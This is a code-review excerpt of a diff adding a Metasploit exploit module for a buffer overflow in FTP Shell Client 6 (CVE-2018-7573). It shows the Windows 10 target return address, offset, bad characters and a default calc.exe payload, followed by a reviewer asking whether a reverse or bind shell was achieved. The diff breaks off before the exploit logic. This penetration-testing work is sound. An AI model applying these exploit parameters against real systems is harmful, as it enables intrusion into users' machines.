modules/exploits/windows/ftp/ftpshell_client.rb

```diff
@@ -0,0 +1,122 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ManualRanking
+
+  include Msf::Exploit::Remote::TcpServer
+
+  def initialize(info = {})
+    super(update_info(info,
+                      'Name'           => 'FTP Shell Client - Buffer Overflow',
+                      'Description'    => ' This module exploits a buffer
+                      overflow vulnerability on FTP Shell Client version 6 ',
+                      'Author' =>
+                        [
+                          'Sebastián Castro @r4wd3r', # Original exploit author
+                          'Berk Cem Goksel @berkcgoksel', # MSF module author
+                        ],
+                      'License'        => MSF_LICENSE,
+                      'References'     =>
+                        [
+                          ['CVE', '2018-7573'],
+                          %w[EDB 44596]
+                        ],
+                      'Payload'        =>
+                        {
+                          'Platform' => 'windows',
+                          'Space'       => 400,
+                          'DisableNops' => true,
+                          'BadChars' => "\x00\x22\x0d\x0a",
+                          'StackAdjustment' => -400
+                        },
+                      'Platform'       => 'win',
+                      'Targets'        =>
+                        [
+                          ['Windows 10',
+                           {
+                             'Ret'     =>  0x452eed,
+                             # CALL ESI from FTPShell.exe
+                             'Offset'  =>  400
+                           }]
+                        ],
+                      'Privileged'     => false,
+                      'DefaultOptions' =>
+                        {
+                          'EXITFUNC' => 'thread',
+                          'DisablePayloadHandler' => 'true',
+                          'SRVHOST' => '0.0.0.0',
+                          'Payload' => 'windows/exec',
+                          'CMD' => 'calc.exe'
```

Comment:
Is there a reason that `calc.exe` is hardcoded? Were you able to get a reverse/bind shell?